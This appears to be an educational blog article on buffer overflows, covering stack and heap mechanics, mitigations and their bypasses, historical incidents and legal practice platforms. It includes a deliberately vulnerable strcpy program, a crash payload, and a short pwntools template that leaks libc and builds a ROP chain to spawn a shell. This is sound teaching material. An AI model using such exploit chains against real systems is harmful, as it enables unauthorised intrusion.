Buffer Overflow Explained — Stack Mechanics, Exploits, and Mitigations thumbnail

Buffer Overflow Explained — Stack Mechanics, Exploits, and Mitigations

⏱ approx. 19 min views 198 likes 0 LOG_DATE:2026-05-10
TOC

Buffer Overflow (BOF) is the classic-of-classics among memory-safety vulnerabilities: writing past the end of an allocated buffer and corrupting the adjacent memory region. From the 1988 Morris Worm to glibc CVE-2024-2961 in 2024, it has remained an active attack surface. This article covers stack BOF mechanics, an overview of heap BOF, the mitigation/bypass arms race, historical incidents, and legitimate practice grounds — end to end.

01

Why BOF is still load-bearing #

"Surely in the age of Rust and Go this is an old problem?" is a tempting thought, but published statistics from the Microsoft Security Response Center and Google Project Zero report that "about 70% of our CVEs are still memory safety bugs". The bulk of the code carrying modern infrastructure — Linux kernel, Windows internals, Chrome, Firefox, OpenSSL, FFmpeg — is still written in C/C++.

The reason BOF persists comes back to the foundational design of C/C++.

  • No bounds checking on array access — neither the compiler nor the runtime stops you from writing buf[1000000]
  • Standard functions take no "size of the destination" argumentstrcpy / gets / sprintf / memcpy all trust the input length and just write
  • Pointers can point at arbitrary memory — out-of-bounds references and accesses that bypass the allocator are both possible
  • Memory ownership is not tracked at compile time — use-after-free and double-free cannot be prevented statically
▸ The long migration to memory-safe languages

Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript structurally prevent these classes by having the compiler or runtime check them. Rust merging into the Linux kernel (2022 onward), Microsoft moving from TypeScript to Rust, and Android standardising on Rust for new native code are all consequences of this. Even so, the industry consensus is that a full replacement will take 20+ years.

02

How a stack-based BOF works #

The classic of classics — stack-based buffer overflow — is dissected by looking at the function-call stack frame. The positional relationship between the local buffer and the saved return address is the ignition point of the attack.

x86_64 Linux stack frame (high → low addresses) #

Region Role
Caller's arguments / environment High end (e.g. 0x7fff...ff00)
★ saved RIP (return address) Points to the next instruction in the caller = the attack target
saved RBP Base pointer of the previous stack frame
Local variables Small variables inside the function
char buf[64] The 64-byte buffer allocated on the stack (low end)
Classic vulnerable stack-BOF code
// vulnerable.c #include <string.h> #include <stdio.h> void vulnerable(char *input) { char buf[64]; // 64 bytes on the stack strcpy(buf, input); // ★ no size check → past 64 bytes the saved RIP is overwritten printf("%s\n", buf); } int main(int argc, char **argv) { if (argc > 1) vulnerable(argv[1]); return 0; }
Build with every mitigation off and see the segfault
$ gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable # distance to saved RIP = buf + saved RBP = 64 + 8 = 72 bytes $ ./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")') Segmentation fault # RIP = 0x4242424242424242 (= "BBBBBBBB")

What the attacker stuffs into the input #

  • Shellcode injection — pack shellcode (a few dozen bytes of assembly that spawn /bin/sh) into the buffer, and overwrite the saved RIP with the buffer's own address. Defeated by NX (DEP)
  • ret2libc — point saved RIP at libc's system() and pass the address of /bin/sh as the argument. Defeated by ASLR
  • ROP (Return-Oriented Programming) — chain together existing code snippets (gadgets) using ret to build arbitrary behaviour. The mainstream of modern BOF exploits
  • JOP / SROP / COOP — variants of ROP
▸ The dangerous C standard library — "do not use" for 30 years
  • gets() — no size argument. Removed in C11 but still found in surviving code
  • strcpy() / strcat() / sprintf() — no size argument. The strncpy family has its own pitfalls (missing NUL terminator)
  • scanf("%s", buf) — unsized %s is effectively gets. You need %63s
  • memcpy(dst, src, attacker_controlled_len) — if len is attacker-controlled, the bug is the same
03

Heap-based BOF — targeting chunk metadata #

BOF that happens on the heap (regions allocated with malloc() / new) rather than the stack is heap BOF. It doesn't grab PC as directly as stack BOF, but by corrupting the heap allocator's bookkeeping metadata it can be developed into arbitrary memory write (write-what-where).

In glibc's malloc (ptmalloc2), each chunk has a header [size | prev_size | data...], and freed chunks are joined into a doubly-linked list. Overwriting the fd / bk pointers of an adjacent chunk via a heap BOF lets a later unlink() write to an arbitrary address — the classic "unlink attack".

Modern glibc added a lot of consistency checks to unlink(), but House of Force / House of Spirit / fastbin dup / tcache poisoning / large bin attack and other generation-specific techniques keep being published. The tcache family since glibc 2.35 is a particularly active area of new attacks.

Memory-safety vulnerabilities alongside heap BOF #

  • Use-After-Free (UAF) — use a pointer after free() → the memory has been reused for something else, so writing corrupts that other data
  • Double Freefree() the same pointer twice → the free list is destroyed
  • Type Confusion — treat an object as a different type (frequent in C++ vtables)
  • Out-of-Bounds ReadHeartbleed (CVE-2014-0160) is the canonical example. Not writing, but reading: the contents of adjacent memory leak
▸ All of these share the same root: the language doesn't check pointer validity at compile time

BOF / UAF / double free / type confusion / OOB read are all consequences of the same C/C++ design choice — neither memory ownership nor bounds are tracked by the language.

04

The mitigation / bypass arms race #

Since BOF can't be eliminated outright, the OS, compiler, and hardware have layered mitigations on top of each other. Every mitigation has a bypass.

Mitigation Introduced Goal Main bypass
Stack Canary (SSP) 1998 (StackGuard) → standardized 2000s Place a secret value just before saved RIP and verify it before return Leak the canary via info leak / reach ret through a different path
DEP / NX bit 2003-2005 Mark data regions non-executable → shellcode in buf can't run ROP (chain existing code snippets) / ret2libc
ASLR 2001 (PaX) → mainline 2005 Randomize load addresses of stack / heap / libc / executable info leak / partial overwrite / brute force (32-bit) / BROP
PIE Standard from the 2010s Randomize the main executable too info leak the executable base / GOT overwrite
CFI / Intel CET / ARM PAC 2018-2020s Verify indirect-call targets and ret destinations at runtime data-only attacks that stay within CFI / COOP
Memory-Safe Languages Rust 2015 / Go 2009 / Swift 2014 Build bounds checks into the language itself — BOF is impossible in principle Bugs inside unsafe blocks / C reached via FFI

A modern binary (anything distributed by a Linux distro) ships with all five — SSP + DEP + ASLR + PIE + RELRO. You can confirm with checksec.sh or pwntools' checksec — missing even one significantly lowers exploit difficulty.

Check a binary's mitigations at a glance
$ checksec --file=./vulnerable RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Full RELRO Canary found NX enab. PIE en. No RPATH No RUNPATH No symbols Yes # From pwntools in Python $ python3 -c 'from pwn import *; print(checksec("./vulnerable"))'
▸ "All mitigations enabled" does not equal "unexploitable"

Combine one info leak (arbitrary read) with one BOF and a modern exploit can punch through nearly any protection stack. Pwn2Own produces multiple full sandbox escapes per year across Chrome, Safari, iOS, and the Windows kernel. Mitigations raise the wall; they do not make it impassable.

05

Historical incidents — BOFs that changed the world #

Year Incident Mechanism Impact
1988 Morris Worm Stack BOF in fingerd's gets() + sendmail debug + rsh brute force Took down ~10% of the Internet. The first Internet worm. Triggered the founding of CERT
1996 Aleph One "Smashing the Stack" (Phrack 49) First textbook-level explanation of stack BOF and shellcode authoring The starting point of modern exploitation. Still cited as a classic
2001 Code Red (CVE-2001-0500) BOF against IIS Index Server Infected 350,000 Windows servers; designed to DDoS the White House
2003 SQL Slammer (CVE-2002-0649) A 376-byte UDP BOF packet against MS SQL Server 2000 Spread to 75,000 hosts in 10 minutes; congested global bandwidth; took ATMs offline
2014 Heartbleed (CVE-2014-0160) Out-of-bounds READ in the OpenSSL TLS heartbeat 17% of HTTPS servers exposed private keys / session data / passwords
2017 WannaCry / EternalBlue (CVE-2017-0144) Heap overflow when parsing an SMBv1 structure 200,000+ Windows machines hit with ransomware. NHS / railways / car factories halted
2024 glibc CVE-2024-2961 Out-of-bounds write in iconv's ISO-2022-CN-EXT PoC published showing how PHP filter chains develop it into RCE
▸ Memory-safety vulnerabilities did not vanish in 30 years

This fact is exactly what motivates Microsoft / Google to switch new code to Rust. The Linux kernel accepting Rust (2022), portions of the Windows kernel moving to Rust, and Android standardising on Rust for new native code are all downstream of this realization.

06

How to learn — legitimate practice platforms #

Trying any of this on someone else's system = unauthorized access (criminal offence). The right entry point is a deliberately-vulnerable practice environment.

Platform Content Difficulty
pwn.college Free Arizona State University course. Curriculum from stack BOF → ROP → kernel exploits Beginner to advanced
pwnable.kr The veteran Korean pwn site. Level-graded vulnerable binaries Beginner to advanced
pwnable.tw Taiwan's advanced pwn site. Strong heap / kernel exploits Intermediate to elite
picoCTF Beginner CTF hosted by Carnegie Mellon. PicoGym is permanently available Beginner
HackTheBox General challenges → Pwn category Beginner to advanced
OverTheWire (Narnia, Behemoth, Vortex) Classic BOF / format string wargames Beginner to intermediate
Microcorruption Matasano's ARM embedded-device BOF wargame Beginner to intermediate
Exploit-Education (Phoenix, Nebula) A series that raises protections step by step Beginner to intermediate

Required tools (all included in Kali Linux) #

The standard set for dynamic analysis, static analysis, and exploit development
# Dynamic analysis / debuggers $ gdb + pwndbg / GEF / peda # enhanced GDB (essential for modern pwn) $ strace -f ./vulnerable # syscall trace $ ltrace ./vulnerable # library-call trace # Static analysis / binary analysis $ checksec --file=./bin # confirm mitigations $ ROPgadget --binary ./bin # enumerate ROP gadgets $ ropper --file ./bin # same idea, alternative implementation $ objdump -d ./bin | less # disassembly $ radare2 ./bin # lightweight reverse engineering $ ghidra # NSA's GUI decompiler # Exploit development $ python3 + pwntools # de facto standard for exploit scripts $ one_gadget ./libc.so.6 # enumerate one-shot execve('/bin/sh') addresses inside libc

A minimal pwntools exploit template #

info leak → ROP chain → shell
from pwn import * elf = ELF("./vulnerable") libc = ELF("./libc.so.6") p = process("./vulnerable") # local; use remote("host", port) for remote # 1. info leak to get libc base p.sendline(b"A" * 64 + p64(elf.plt["puts"])) leak = u64(p.recvline().strip().ljust(8, b"\x00")) libc_base = leak - libc.sym["puts"] # 2. build the ROP chain rop = ROP(libc) rop.raw(b"A" * 72) # padding to saved RIP rop.system(next(libc.search(b"/bin/sh\x00")) + libc_base) p.sendline(rop.chain()) p.interactive() # shell
▸ Never run this against anything outside a CTF / practice platform

Trying any of this on a real service is a crime the moment you do it. Even an internal pentest at your employer requires a written Rules of Engagement (RoE). The same legal and ethical framing as in the Kali Linux article applies here.

07

Summary — an honest take as of 2026 #

  • BOF is the consequence of a 1970s language design decision: "C/C++ doesn't bounds-check memory." For 30+ years it has been a primary Internet-scale attack surface
  • Stack BOF (strcpy past the end → overwrite saved RIP → seize control on ret) and heap BOF (corrupt chunk metadata → write-where) share the same root
  • Reading the history as an arms race — mitigations piling up (SSP / DEP / ASLR / PIE / CFI) versus bypasses evolving (ROP / info leak / heap grooming) — makes modern memory-safety CVE writeups readable with a map
  • The real answer is rewriting in memory-safe languages. With full replacement still 20+ years away, the practical mix is:
    • Verify the mitigation stack is correctly enabled with checksec
    • Catch memory-safety bugs early with fuzzing
    • Start new projects in Rust / Go
    • For existing C/C++, prefer bounds-checked alternatives (strncpy_s / snprintf / Rust wrappers)
𝕏 Post B! Hatena